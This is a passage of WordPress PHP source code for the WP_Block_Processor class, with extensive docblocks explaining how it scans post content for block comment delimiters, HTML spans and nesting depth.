* - {@see self::next_token()} visits every contiguous subspan of text in the
* input document. This includes all explicit block comment delimiters and spans
* of HTML content (whether freeform or inner HTML).
* - {@see self::next_delimiter()} visits every explicit block comment delimiter
* unless passed a block type which covers freeform HTML content. In these cases
* it will stop at top-level spans of HTML and report a `null` block type.
* - {@see self::next_block()} visits every block delimiter which _opens_ a block.
* This includes opening block delimiters as well as void block delimiters. With
* the same exception as above for freeform HTML block types, this will visit
* top-level spans of HTML content.
*
* When matched on a particular token, the following methods provide structural
* and textual information about it:
*
* - {@see self::get_delimiter_type()} reports whether the delimiter is an opener,
* a closer, or if it represents a whole void block.
* - {@see self::get_block_type()} reports the fully-qualified block type which
* the delimiter represents.
* - {@see self::get_printable_block_type()} reports the fully-qualified block type,
* but returns `core/freeform` instead of `null` for top-level freeform HTML content.
* - {@see self::is_block_type()} indicates if the delimiter represents a block of
* the given block type, or wildcard or pseudo-block type described below.
* - {@see self::opens_block()} indicates if the delimiter opens a block of one
* of the provided block types. Opening, void, and top-level freeform HTML content
* all open blocks.
* - {@see static::get_attributes()} is currently reserved for a future streaming
* JSON parser class.
* - {@see self::allocate_and_return_parsed_attributes()} extracts the JSON attributes
* for delimiters which open blocks and return the fully-parsed attributes as an
* associative array. {@see static::get_last_json_error()} for when this fails.
* - {@see self::is_html()} indicates if the token is a span of HTML which might
* be top-level freeform content or a block’s inner HTML.
* - {@see self::get_html_content()} returns the span of HTML.
* - {@see self::get_span()} for the byte offset and length into the input document
* representing the token.
*
* It’s possible for the processor to fail to scan forward if the input document ends
* in a proper prefix of an explicit block comment delimiter. For example, if the input
* ends in `<!-- wp:` then it _might_ be the start of another delimiter. The parser
* cannot know, however, and therefore refuses to proceed. {@see static::get_last_error()}
* to distinguish between a failure to find the next token and an incomplete input.
*
* ### Block types
*
* A block’s “type” comprises an optional _namespace_ and _name_. If the namespace
* isn’t provided it will be interpreted as the implicit `core` namespace. For example,
* the type `gallery` is the name of the block in the `core` namespace, but the type
* `abc/gallery` is the _fully-qualified_ block type for the block whose name is still
* `gallery`, but in the `abc` namespace.
*
* Methods on this class are aware of this block naming semantic and anywhere a block
* type is an argument to a method it will be normalized to account for implicit namespaces.
* Passing `paragraph` is the same as passing `core/paragraph`. On the contrary, anywhere
* this class returns a block type, it will return the fully-qualified and normalized form.
* For example, for the `<!-- wp:group -->` delimiter it will return `core/group` as the
* block type.
*
* There are two special block types that change the behavior of the processor:
*
* - The wildcard `*` represents _any block_. In addition to matching all block types,
* it also represents top-level freeform HTML whose block type is reported as `null`.
*
* - The `core/freeform` block type is a pseudo-block type which explicitly matches
* top-level freeform HTML.
*
* These special block types can be passed into any method which searches for blocks.
*
* There is one additional special block type which may be returned from
* {@see self::get_printable_block_type()}. This is the `#innerHTML` type, which
* indicates that the HTML span on which the processor is paused is inner HTML for
* a containing block.
*
* ### Spans of HTML
*
* Non-block content plays a complicated role in processing block documents. This
* processor exposes tools to help work with these spans of HTML.
*
* - {@see self::is_html()} indicates if the processor is paused at a span of
* HTML but does not differentiate between top-level freeform content and inner HTML.
* - {@see self::is_non_whitespace_html()} indicates not only if the processor
* is paused at a span of HTML, but also whether that span incorporates more than
* whitespace characters. Because block serialization often inserts newlines between
* block comment delimiters, this is useful for distinguishing “real” freeform
* content from purely aesthetic syntax.
* - {@see self::is_block_type()} matches top-level freeform HTML content when
* provided one of the special block types described above.
*
* ### Block structure
*
* As the processor traverses block delimiters it maintains a stack of which blocks are
* open at the given place in the document where it’s paused. This stack represents the
* block structure of a document and is used to determine where blocks end, which blocks
* represent inner blocks, whether a span of HTML is top-level freeform content, and
* more. Investigate the stack with {@see self::get_breadcrumbs()}, which returns an
* array of block types starting at the outermost-open block and descending to the
* currently-visited block.
*
* Unlike {@parse_blocks()}, spans of HTML appear in this structure as the special
* reported block type `#html`. Such a span represents inner HTML for a block if the
* depth reported by {@see self::get_depth()} is greater than one.
*
* It will generally not be necessary to inspect the stack of open blocks, though
* depth may be important for finding where blocks end. When visiting a block opener,
* the depth will have been increased before pausing; in contrast the depth is
* decremented before visiting a closer. This makes the following an easy way to
* determine if a block is still open.
*
* Example:
*
* $depth = $processor->get_depth();
* while ( $processor->next_token() && $processor->get_depth() > $depth ) {
* continue
* }
* // Processor is now paused at the token immediately following the closed block.
*
* #### Extracting blocks
*
* A unique feature of this processor is the ability to return the same output as
* {@see \parse_blocks()} would produce, but for a subset of the input document.
* For example, it’s possible to extract an image block, manipulate that parsed
* block, and re-serialize it into the original document. It’s possible to do so
* while skipping over the parse of the rest of the document.
*
* {@see self::extract_full_block_and_advance()} will scan forward from the current block opener
* and build the parsed block structure until the current block is closed. It will
* include all inner HTML and inner blocks, and parse all of the inner blocks. It
* can be used to extract a block at any depth in the document, helpful for operating
* on blocks within nested structure.
*
* Example:
*
* if ( ! $processor->next_block( 'gallery' ) ) {
* return $post_content;
* }
*
* $gallery_at = $processor->get_span()->start;
* $gallery_block = $processor->extract_full_block_and_advance();
* $after_gallery = $processor->get_span()->start;
* return (
* substr( $post_content, 0, $gallery_at ) .
* serialize_block( modify_gallery( $gallery_block ) .
* substr( $post_content, $after_gallery )
* );
*
* #### Handling of malformed structure
*
* There are situations where closing block delimiters appear for which no open block
* exists, or where a document ends before a block is closed, or where a closing block
* delimiter appears but references a different block type than the most-recently
* opened block does. In all of these cases, the stack of open blocks should mirror
* the behavior in {@see \parse_blocks()}.
*
* Unlike {@see \parse_blocks()}, however, this processor can still operate on the
* invalid block delimiters. It provides a few functions which can be used for building
* custom and non-spec-compliant error handling.
*
* - {@see self::has_closing_flag()} indicates if the block delimiter contains the
* closing flag at the end. Some invalid block delimiters might contain both the
* void and closing flag, in which case {@see self::get_delimiter_type()} will
* report that it’s a void block.
* - {@see static::get_last_error()} indicates if the processor reached an invalid
* block closing. Depending on the context, {@see \parse_blocks()} might instead
* ignore the token or treat it as freeform HTML content.
*
* ## Static helpers
*
* This class provides helpers for performing semantic block-related operations.
*
* - {@see self::normalize_block_type()} takes a block type with or without the
* implicit `core` namespace and returns a fully-qualified block type.
* - {@see self::are_equal_block_types()} indicates if two spans across one or
* more input texts represent the same fully-qualified block type.
*
* ## Subclassing
*
* This processor is designed to accurately parse a block document. Therefore, many
* of its methods are not meant for subclassing. However, overall this class supports
* building higher-level convenience classes which may choose to subclass it. For those
* classes, avoid re-implementing methods except for the list below. Instead, create
* new names representing the higher-level concepts being introduced. For example, instead
* of creating a new method named `next_block()` which only advances to blocks of a given
* kind, consider creating a new method named something like `next_layout_block()` which
* won’t interfere with the base class method.
*
* - {@see static::get_last_error()} may be reimplemented to report new errors in the subclass
* which aren’t intrinsic to block parsing.
* - {@see static::get_attributes()} may be reimplemented to provide a streaming interface
* to reading and modifying a block’s JSON attributes. It should be fast and memory efficient.
* - {@see static::get_last_json_error()} may be reimplemented to report new errors introduced
* with a reimplementation of {@see static::get_attributes()}.
*
* @since 6.9.0
*/
class WP_Block_Processor {
/**
* Indicates if the last operation failed, otherwise
* will be `null` for success.
*
* @since 6.9.0
*
* @var string|null
*/
private $last_error = null;
/**
* Indicates failures from decoding JSON attributes.
*
* @since 6.9.0
*
* @see \json_last_error()
*
* @var int
*/
private $last_json_error = JSON_ERROR_NONE;
/**
* Source text provided to processor.
*
* @since 6.9.0
*
* @var string
*/
protected $source_text;
/**
* Byte offset into source text where a matched delimiter starts.
*
* Example:
*
* 5 10 15 20 25 30 35 40 45 50
* <!-- wp:group --><!-- wp:void /--><!-- /wp:group -->
* ╰─ Starts at byte offset 17.
*
* @since 6.9.0
*
* @var int
*/
private $matched_delimiter_at = 0;
/**
* Byte length of full span of a matched delimiter.
*
* Example:
*
* 5 10 15 20 25 30 35 40 45 50
* <!-- wp:group --><!-- wp:void /--><!-- /wp:group -->
* ╰───────────────╯
* 17 bytes long.
*
* @since 6.9.0
*
* @var int
*/
private $matched_delimiter_length = 0;
/**
* First byte offset into source text following any previously-matched delimiter.
* Used to indicate where an HTML span starts.
*
* Example:
*
* 5 10 15 20 25 30 35 40 45 50 55
* <!-- wp:paragraph --><p>Content</p><⃨!⃨-⃨-⃨ ⃨/⃨w⃨p⃨:⃨p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ ⃨-⃨-⃨>⃨
* │ ╰─ This delimiter was matched, and after matching,
* │ revealed the preceding HTML span.
* │
* ╰─ The first byte offset after the previous matched delimiter
* is 21. Because the matched delimiter starts at 55, which is after
* this, a span of HTML must exist between these boundaries.
*
* @since 6.9.0
*
* @var int
*/
private $after_previous_delimiter = 0;
/**
* Byte offset where namespace span begins.
*
* When no namespace is present, this will be the same as the starting
* byte offset for the block name.
*
* Example:
*
* <!-- wp:core/gallery -->
* │ ╰─ Name starts here.
* ╰─ Namespace starts here.
*
* <!-- wp:gallery -->
* ├─ The namespace would start here but is implied as “core.”
* ╰─ The name starts here.
*
* @since 6.9.0
*
* @var int
*/
private $namespace_at = 0;
/**
* Byte offset where block name span begins.
*
* When no namespace is present, this will be the same as the starting
* byte offset for the block namespace.
*
* Example:
*
* <!-- wp:core/gallery -->
* │ ╰─ Name starts here.
* ╰─ Namespace starts here.
*
* <!-- wp:gallery -->
* ├─ The namespace would start here but is implied as “core.”
* ╰─ The name starts here.
*
* @since 6.9.0
*
* @var int
*/
private $name_at = 0;
/**
* Byte length of block name span.
*
* Example:
*
* 5 10 15 20 25
* <!-- wp:core/gallery -->
* ╰─────╯
* 7 bytes long.
*
* @since 6.9.0
*
* @var int
*/
private $name_length = 0;
/**
* Whether the delimiter contains the block-closing flag.
*
* This may be erroneous if present within a void block,
* therefore the {@see self::has_closing_flag()} can be used by
* calling code to perform custom error-handling.
*
* @since 6.9.0
*
* @var bool
*/
private $has_closing_flag = false;
/**
* Byte offset where JSON attributes span begins.
*
* Example:
*
* 5 10 15 20 25 30 35 40
* <!-- wp:paragraph {"dropCaps":true} -->
* ╰─ Starts at byte offset 18.
*
* @since 6.9.0
*
* @var int
*/
private $json_at;
/**
* Byte length of JSON attributes span, or 0 if none are present.
*
* Example:
*
* 5 10 15 20 25 30 35 40
* <!-- wp:paragraph {"dropCaps":true} -->
* ╰───────────────╯
* 17 bytes long.
*
* @since 6.9.0
*
* @var int
*/
private $json_length = 0;
/**
* Internal parser state, differentiating whether the instance is currently matched,
* on an implicit freeform node, in error, or ready to begin parsing.
*
* @see self::READY
* @see self::MATCHED
* @see self::HTML_SPAN
* @see self::INCOMPLETE_INPUT
* @see self::COMPLETE
*
* @since 6.9.0
*
* @var string
*/
protected $state = self::READY;
/**
* Indicates what kind of block comment delimiter was matched.
*
* One of:
*
* - {@see self::OPENER} If the delimiter is opening a block.
* - {@see self::CLOSER} If the delimiter is closing an open block.
* - {@see self::VOID} If the delimiter represents a void block with no inner content.
*
* If a parsed comment delimiter contains both the closing and the void
* flags then it will be interpreted as a void block to match the behavior
* of the official block parser, however, this is a syntax error and probably
* the block ought to close an open block of the same name, if one is open.
*
* @since 6.9.0
*
* @var string
*/
private $type;
/**
* Whether the last-matched delimiter acts like a void block and should be
* popped from the stack of open blocks as soon as the parser advances.
*
* This applies to void block delimiters and to HTML spans.
*
* @since 6.9.0
*
* @var bool
*/
private $was_void = false;
/**
* For every open block, in hierarchical order, this stores the byte offset
* into the source text where the block type starts, including for HTML spans.
*
* To avoid allocating and normalizing block names when they aren’t requested,
* the stack of open blocks is stored as the byte offsets and byte lengths of
* each open block’s block type. This allows for minimal tracking and quick
* reading or comparison of block types when requested.
*
* @since 6.9.0
*
* @see self::$open_blocks_length
*
* @var int[]
*/
private $open_blocks_at = array();
/**
* For every open block, in hierarchical order, this stores the byte length
* of the block’s block type in the source text. For HTML spans this is 0.
*
* @since 6.9.0
*
* @see self::$open_blocks_at
*
* @var int[]
*/
private $open_blocks_length = array();
/**
* Indicates which operation should apply to the stack of open blocks after
* processing any pending spans of HTML.
*
* Since HTML spans are discovered after matching block delimiters, those
* delimiters need to defer modifying the stack of open blocks. This value,
* if set, indicates what operation should be applied. The properties
* associated with token boundaries still point to the delimiters even
* when processing HTML spans, so there’s no need to track them independently.
*
* @var 'push'|'void'|'pop'|null
*/
private $next_stack_op = null;
/**
* Creates a new block processor.
*
* Example:
*
* $processor = new WP_Block_Processor( $post_content );
* if ( $processor->next_block( 'core/image' ) ) {
* echo "Found an image!\n";
* }
*
* @see self::next_block() to advance to the start of the next block (skips closers).
* @see self::next_delimiter() to advance to the next explicit block delimiter.
* @see self::next_token() to advance to the next block delimiter or HTML span.
*
* @since 6.9.0
*
* @param string $source_text Input document potentially containing block content.
*/
public function __construct( string $source_text ) {
$this->source_text = $source_text;
}
/**
* Advance to the next block delimiter which opens a block, indicating if one was found.
*
* Delimiters which open blocks include opening and void block delimiters. To visit
* freeform HTML content, pass the wildcard “*” as the block type.
*
* Use this function to walk through the blocks in a document, pausing where they open.
*
* Example blocks:
*
* // The first delimiter opens the paragraph block.
* <⃨!⃨-⃨-⃨ ⃨w⃨p⃨:⃨p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ ⃨-⃨-⃨>⃨<p>Content</p><!-- /wp:paragraph-->
*
* // The void block is the first opener in this sequence of closers.
* <!-- /wp:group --><⃨!⃨-⃨-⃨ ⃨w⃨p⃨:⃨s⃨p⃨a⃨c⃨e⃨r⃨ ⃨{⃨"⃨h⃨e⃨i⃨g⃨h⃨t⃨"⃨:⃨"⃨2⃨0⃨0⃨p⃨x⃨"⃨}⃨ ⃨/⃨-⃨-⃨>⃨<!-- /wp:group -->
*
* // If, however, `*` is provided as the block type, freeform content is matched.
* <⃨h⃨2⃨>⃨M⃨y⃨ ⃨s⃨y⃨n⃨o⃨p⃨s⃨i⃨s⃨<⃨/⃨h⃨2⃨>⃨\⃨n⃨<!-- wp:my/table-of-contents /-->
*
* // Inner HTML is never freeform content, and will not be matched even with the wildcard.
* <!-- /wp:list-item --></ul><!-- /wp:list --><⃨!⃨-⃨-⃨ ⃨w⃨p⃨:⃨p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ ⃨-⃨>⃨<p>
*
* Example:
*
* // Find all textual ranges of image block opening delimiters.
* $images = array();
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_block( 'core/image' ) ) {
* $images[] = $processor->get_span();
* }
*
* In some cases it may be useful to conditionally visit the implicit freeform
* blocks, such as when determining if a post contains freeform content that
* isn’t purely whitespace.
*
* Example:
*
* $seen_block_types = [];
* $block_type = '*';
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_block( $block_type ) {
* // Stop wasting time visiting freeform blocks after one has been found.
* if (
* '*' === $block_type &&
* null === $processor->get_block_type() &&
* $processor->is_non_whitespace_html()
* ) {
* $block_type = null;
* $seen_block_types['core/freeform'] = true;
* continue;
* }
*
* $seen_block_types[ $processor->get_block_type() ] = true;
* }
*
* @since 6.9.0
*
* @see self::next_delimiter() to advance to the next explicit block delimiter.
* @see self::next_token() to advance to the next block delimiter or HTML span.
*
* @param string|null $block_type Optional. If provided, advance until a block of this type is found.
* Default is to stop at any block regardless of its type.
* @return bool Whether an opening delimiter for a block was found.
*/
public function next_block( ?string $block_type = null ): bool {
while ( $this->next_delimiter( $block_type ) ) {
if ( self::CLOSER !== $this->get_delimiter_type() ) {
return true;
}
}
return false;
}
/**
* Advance to the next block delimiter in a document, indicating if one was found.
*
* Delimiters may include invalid JSON. This parser does not attempt to parse the
* JSON attributes until requested; when invalid, the attributes will be null. This
* matches the behavior of {@see \parse_blocks()}. To visit freeform HTML content,
* pass the wildcard “*” as the block type.
*
* Use this function to walk through the block delimiters in a document.
*
* Example delimiters:
*
* <!-- wp:paragraph {"dropCap": true} -->
* <!-- wp:separator /-->
* <!-- /wp:paragraph -->
*
* // If the wildcard `*` is provided as the block type, freeform content is matched.
* <⃨h⃨2⃨>⃨M⃨y⃨ ⃨s⃨y⃨n⃨o⃨p⃨s⃨i⃨s⃨<⃨/⃨h⃨2⃨>⃨\⃨n⃨<!-- wp:my/table-of-contents /-->
*
* // Inner HTML is never freeform content, and will not be matched even with the wildcard.
* ...</ul><⃨!⃨-⃨-⃨ ⃨/⃨w⃨p⃨:⃨l⃨i⃨s⃨t⃨ ⃨-⃨-⃨>⃨<!-- wp:paragraph --><p>
*
* Example:
*
* $html = '<!-- wp:void /-->\n<!-- wp:void /-->';
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_delimiter() {
* // Runs twice, seeing both void blocks of type “core/void.”
* }
*
* $processor = new WP_Block_Processor( $html );
* while ( $processor->next_delimiter( '*' ) ) {
* // Runs thrice, seeing the void block, the newline span, and the void block.
* }
*
* @since 6.9.0
*
* @param string|null $block_name Optional. Keep searching until a block of this name is found.
* Defaults to visit every block regardless of type.
* @return bool Whether a block delimiter was matched.
*/
public function next_delimiter( ?string $block_name = null ): bool {
if ( ! isset( $block_name ) ) {
while ( $this->next_token() ) {
if ( ! $this->is_html() ) {
return true;
}
}
return false;
}
while ( $this->next_token() ) {
if ( $this->is_block_type( $block_name ) ) {
return true;
}
}
return false;
}
/**
* Advance to the next block delimiter or HTML span in a document, indicating if one was found.
*
* This function steps through every syntactic chunk in a document. This includes explicit
* block comment delimiters, freeform non-block content, and inner HTML segments.
*
* Example tokens:
*
* <!-- wp:paragraph {"dropCap": true} -->
* <!-- wp:separator /-->
* <!-- /wp:paragraph -->
* <p>Normal HTML content</p>
* Plaintext content too!
*
* Example:
*
* // Find span containing wrapping HTML element surrounding inner blocks.
* $processor = new WP_Block_Processor( $html );
* if ( ! $processor->next_block( 'gallery' ) ) {
* return null;
* }
*
* $containing_span = null;
* while ( $processor->next_token() && $processor->is_html() ) {
* $containing_span = $processor->get_span();
* }
*
* This method will visit all HTML spans including those forming freeform non-block
* content as well as those which are part of a block’s inner HTML.
*
* @since 6.9.0
*
* @return bool Whether a token was matched or the end of the document was reached without finding any.
*/
public function next_token(): bool {
if ( $this->last_error || self::COMPLETE === $this->state || self::INCOMPLETE_INPUT === $this->state ) {
return false;
}
// Void tokens automatically pop off the stack of open blocks.
if ( $this->was_void ) {
array_pop( $this->open_blocks_at );
array_pop( $this->open_blocks_length );
$this->was_void = false;
}
$text = $this->source_text;
$end = strlen( $text );
/*
* Because HTML spans are inferred after finding the next delimiter, it means that
* the parser must transition out of that HTML state and reuse the token boundaries
* it found after the HTML span. If those boundaries are before the end of the
* document it implies that a real delimiter was found; otherwise this must be the
* terminating HTML span and the parsing is complete.
*/
if ( self::HTML_SPAN === $this->state ) {
if ( $this->matched_delimiter_at >= $end ) {
$this->state = self::COMPLETE;
return false;
}
switch ( $this->next_stack_op ) {
case 'void':
$this->was_void = true;
$this->open_blocks_at[] = $this->namespace_at;
$this->open_blocks_length[] = $this->name_at + $this->name_length - $this->namespace_at;
break;
case 'push':
$this->open_blocks_at[] = $this->namespace_at;
$this->open_blocks_length[] = $this->name_at + $this->name_length - $this->namespace_at;
break;
case 'pop':
array_pop( $this->open_blocks_at );
array_pop( $this->open_blocks_length );
break;
}
$this->next_stack_op = null;
$this->state = self::MATCHED;
return true;
}
$this->state = self::READY;
$after_prev_delimiter = $this->matched_delimiter_at + $this->matched_delimiter_length;
$at = $after_prev_delimiter;
while ( $at < $end ) {
/*
* Find the next possible start of a delimiter.
*
* This follows the behavior in the official block parser, which segments a post
* by the block comment delimiters. It is possible for an HTML attribute to contain
* what looks like a block comment delimiter but which is actually an HTML attribute
* value. In such a case, the parser here will break apart the HTML and create the
* block boundary inside the HTML attribute. In other words, the block parser
* isolates sections of HTML from each other, even if that leads to malformed markup.
*
* For a more robust parse, scan through the document with the HTML API and parse
* comments once they are matched to see if they are also block delimiters. In
* practice, this nuance has not caused any known problems since developing blocks.
*
* <⃨!⃨-⃨-⃨ /wp:core/paragraph {"dropCap":true} /-->
*/
$comment_opening_at = strpos( $text, '<!--', $at );
/*
* Even if the start of a potential block delimiter is not found, the document
* might end in a prefix of such, and in that case there is incomplete input.
*/
if ( false === $comment_opening_at ) {
if ( str_ends_with( $text, '<!-' ) ) {
$backup = 3;
} elseif ( str_ends_with( $text, '<!' ) ) {
$backup = 2;
} elseif ( str_ends_with( $text, '<' ) ) {
$backup = 1;
} else {
$backup = 0;
}
// Whether or not there is a potential delimiter, there might be an HTML span.
if ( $after_prev_delimiter < ( $end - $backup ) ) {
$this->state = self::HTML_SPAN;
$this->after_previous_delimiter = $after_prev_delimiter;
$this->matched_delimiter_at = $end - $backup;
$this->matched_delimiter_length = $backup;
$this->open_blocks_at[] = $after_prev_delimiter;
$this->open_blocks_length[] = 0;
$this->was_void = true;
return true;
}
/*
* In the case that there is the start of an HTML comment, it means that there
* might be a block delimiter, but it’s not possible know, therefore it’s incomplete.
*/
if ( $backup > 0 ) {
goto incomplete;
}
// Otherwise this is the end.
$this->state = self::COMPLETE;
return false;
}
// <!-- ⃨/wp:core/paragraph {"dropCap":true} /-->
$opening_whitespace_at = $comment_opening_at + 4;
if ( $opening_whitespace_at >= $end ) {
goto incomplete;
}
$opening_whitespace_length = strspn( $text, " \t\f\r\n", $opening_whitespace_at );
/*
* The `wp` prefix cannot come before this point, but it may come after it
* depending on the presence of the closer. This is detected next.
*/
$wp_prefix_at = $opening_whitespace_at + $opening_whitespace_length;
if ( $wp_prefix_at >= $end ) {
goto incomplete;
}
if ( 0 === $opening_whitespace_length ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
// <!-- /⃨wp:core/paragraph {"dropCap":true} /-->
$has_closer = false;
if ( '/' === $text[ $wp_prefix_at ] ) {
$has_closer = true;
++$wp_prefix_at;
}
// <!-- /w⃨p⃨:⃨core/paragraph {"dropCap":true} /-->
if ( $wp_prefix_at < $end && 0 !== substr_compare( $text, 'wp:', $wp_prefix_at, 3 ) ) {
if (
( $wp_prefix_at + 2 >= $end && str_ends_with( $text, 'wp' ) ) ||
( $wp_prefix_at + 1 >= $end && str_ends_with( $text, 'w' ) )
) {
goto incomplete;
}
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
/*
* If the block contains no namespace, this will end up masquerading with
* the block name. It’s easier to first detect the span and then determine
* if it’s a namespace of a name.
*
* <!-- /wp:c⃨o⃨r⃨e⃨/paragraph {"dropCap":true} /-->
*/
$namespace_at = $wp_prefix_at + 3;
if ( $namespace_at >= $end ) {
goto incomplete;
}
$start_of_namespace = $text[ $namespace_at ];
// The namespace must start with a-z.
if ( 'a' > $start_of_namespace || 'z' < $start_of_namespace ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
$namespace_length = 1 + strspn( $text, 'abcdefghijklmnopqrstuvwxyz0123456789-_', $namespace_at + 1 );
$separator_at = $namespace_at + $namespace_length;
if ( $separator_at >= $end ) {
goto incomplete;
}
// <!-- /wp:core/⃨paragraph {"dropCap":true} /-->
$has_separator = '/' === $text[ $separator_at ];
if ( $has_separator ) {
$name_at = $separator_at + 1;
if ( $name_at >= $end ) {
goto incomplete;
}
// <!-- /wp:core/p⃨a⃨r⃨a⃨g⃨r⃨a⃨p⃨h⃨ {"dropCap":true} /-->
$start_of_name = $text[ $name_at ];
if ( 'a' > $start_of_name || 'z' < $start_of_name ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
$name_length = 1 + strspn( $text, 'abcdefghijklmnopqrstuvwxyz0123456789-_', $name_at + 1 );
} else {
$name_at = $namespace_at;
$name_length = $namespace_length;
}
if ( $name_at + $name_length >= $end ) {
goto incomplete;
}
/*
* For this next section of the delimiter, it could be the JSON attributes
* or it could be the end of the comment. Assume that the JSON is there and
* update if it’s not.
*/
// <!-- /wp:core/paragraph ⃨{"dropCap":true} /-->
$after_name_whitespace_at = $name_at + $name_length;
$after_name_whitespace_length = strspn( $text, " \t\f\r\n", $after_name_whitespace_at );
$json_at = $after_name_whitespace_at + $after_name_whitespace_length;
if ( $json_at >= $end ) {
goto incomplete;
}
if ( 0 === $after_name_whitespace_length ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
// <!-- /wp:core/paragraph {⃨"dropCap":true} /-->
$has_json = '{' === $text[ $json_at ];
$json_length = 0;
/*
* For the final span of the delimiter it's most efficient to find the end of the
* HTML comment and work backwards. This prevents complicated parsing inside the
* JSON span, which is not allowed to contain the HTML comment terminator.
*
* This also matches the behavior in the official block parser,
* even though it allows for matching invalid JSON content.
*
* <!-- /wp:core/paragraph {"dropCap":true} /-⃨-⃨>⃨
*/
$comment_closing_at = strpos( $text, '-->', $json_at );
if ( false === $comment_closing_at ) {
goto incomplete;
}
// <!-- /wp:core/paragraph {"dropCap":true} /⃨-->
if ( '/' === $text[ $comment_closing_at - 1 ] ) {
$has_void_flag = true;
$void_flag_length = 1;
} else {
$has_void_flag = false;
$void_flag_length = 0;
}
/*
* If there's no JSON, then the span of text after the name
* until the comment closing must be completely whitespace.
* Otherwise it’s a normal HTML comment.
*/
if ( ! $has_json ) {
if ( $after_name_whitespace_at + $after_name_whitespace_length === $comment_closing_at - $void_flag_length ) {
// This must be a block delimiter!
$this->state = self::MATCHED;
break;
}
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
/*
* There's JSON, so attempt to find its boundary.
*
* @todo It’s likely faster to scan forward instead of in reverse.
*
* <!-- /wp:core/paragraph {"dropCap":true}⃨ ⃨/-->
*/
$after_json_whitespace_length = 0;
for ( $char_at = $comment_closing_at - $void_flag_length - 1; $char_at > $json_at; $char_at-- ) {
$char = $text[ $char_at ];
switch ( $char ) {
case ' ':
case "\t":
case "\f":
case "\r":
case "\n":
++$after_json_whitespace_length;
continue 2;
case '}':
$json_length = $char_at - $json_at + 1;
break 2;
default:
++$at;
continue 3;
}
}
/*
* This covers cases where there is no terminating “}” or where
* mandatory whitespace is missing.
*/
if ( 0 === $json_length || 0 === $after_json_whitespace_length ) {
$at = $this->find_html_comment_end( $comment_opening_at, $end );
continue;
}
// This must be a block delimiter!
$this->state = self::MATCHED;
break;
}
// The end of the document was reached without a match.
if ( self::MATCHED !== $this->state ) {
$this->state = self::COMPLETE;
return false;
}
/*
* From this point forward, a delimiter has been matched. There
* might also be an HTML span that appears before the delimiter.
*/
$this->after_previous_delimiter = $after_prev_delimiter;
$this->matched_delimiter_at = $comment_opening_at;
$this->matched_delimiter_length = $comment_closing_at + 3 - $comment_opening_at;
$this->namespace_at = $namespace_at;
$this->name_at = $name_at;
$this->name_length = $name_length;
$this->json_at = $json_at;
$this->json_length = $json_length;
/*
* When delimiters contain both the void flag and the closing flag
* they shall be interpreted as void blocks, per the spec parser.
*/
if ( $has_void_flag ) {
$this->type = self::VOID;
$this->next_stack_op = 'void';
} elseif ( $has_closer ) {
$this->type = self::CLOSER;
$this->next_stack_op = 'pop';
/*
* @todo Check if the name matches and bail according to the spec parser.
* The default parser doesn’t examine the names.
*/
} else {
$this->type = self::OPENER;
$this->next_stack_op = 'push';
}
$this->has_closing_flag = $has_closer;
// HTML spans are visited before the delimiter that follows them.
if ( $comment_opening_at > $after_prev_delimiter ) {
$this->state = self::HTML_SPAN;
$this->open_blocks_at[] = $after_prev_delimiter;
$this->open_blocks_length[] = 0;
$this->was_void = true;
return true;
}
// If there were no HTML spans then flush the enqueued stack operations immediately.
switch ( $this->next_stack_op ) {
case 'void':
$this->was_void = true;
$this->open_blocks_at[] = $namespace_at;
$this->open_blocks_length[] = $name_at + $name_length - $namespace_at;
break;
case 'push':
$this->open_blocks_at[] = $namespace_at;
$this->open_blocks_length[] = $name_at + $name_length - $namespace_at;
break;
case 'pop':
array_pop( $this->open_blocks_at );
array_pop( $this->open_blocks_length );
break;
}
$this->next_stack_op = null;
return true;
incomplete:
$this->state = self::COMPLETE;
$this->last_error = self::INCOMPLETE_INPUT;
return false;
}
/**
* Returns an array containing the names of the currently-open blocks, in order
* from outermost to innermost, with HTML spans indicated as “#html”.
*
* Example:
*
* // Freeform HTML content is an HTML span.
* $processor = new WP_Block_Processor( 'Just text' );
* $processor->next_token();
* array( '#text' ) === $processor->get_breadcrumbs();
*
* $processor = new WP_Block_Processor( '<!-- wp:a --><!-- wp:b --><!-- wp:c /--><!-- /wp:b --><!-- /wp:a -->' );
* $processor->next_token();
* array( 'core/a' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* array( 'core/a', 'core/b' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* // Void blocks are only open while visiting them.
* array( 'core/a', 'core/b', 'core/c' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* // Blocks are closed before visiting their closing delimiter.
* array( 'core/a' ) === $processor->get_breadcrumbs();
* $processor->next_token();
* array() === $processor->get_breadcrumbs();
*
* // Inner HTML is also an HTML span.
* $processor = new WP_Block_Processor( '<!-- wp:a -->Inner HTML<!-- /wp:a -->' );
* $processor->next_token();
* $processor->next_token();
* array( 'core/a', '#html' ) === $processor->get_breadcrumbs();
*
* @since 6.9.0
*
* @return string[]
*/
public function get_breadcrumbs(): array {
$breadcrumbs = array_fill( 0, count( $this->open_blocks_at ), null );
/*
* Since HTML spans can only be at the very end, set the normalized block name for
* each open element and then work backwards after creating the array. This allows
* for the elimination of a conditional on each iteration of the loop.
*/
foreach ( $this->open_blocks_at as $i => $at ) {
$block_type = substr( $this->source_text, $at, $this->open_blocks_length[ $i ] );
$breadcrumbs[ $i ] = self::normalize_block_type( $block_type );
}
if ( isset( $i ) && 0 === $this->open_blocks_length[ $i ] ) {
$breadcrumbs[ $i ] = '#html';
}
return $breadcrumbs;
}
/**
* Returns the depth of the open blocks where the processor is currently matched.
*
* Depth increases before visiting openers and void blocks and decreases before
* visiting closers. HTML spans behave like void blocks.
*
* @since 6.9.0
*
* @return int
*/
public function get_depth(): int {
return count( $this->open_blocks_at );
}
/**
* Extracts a block object, and all inner content, starting at a matched opening
* block delimiter, or at a matched top-level HTML span as freeform HTML content.
*
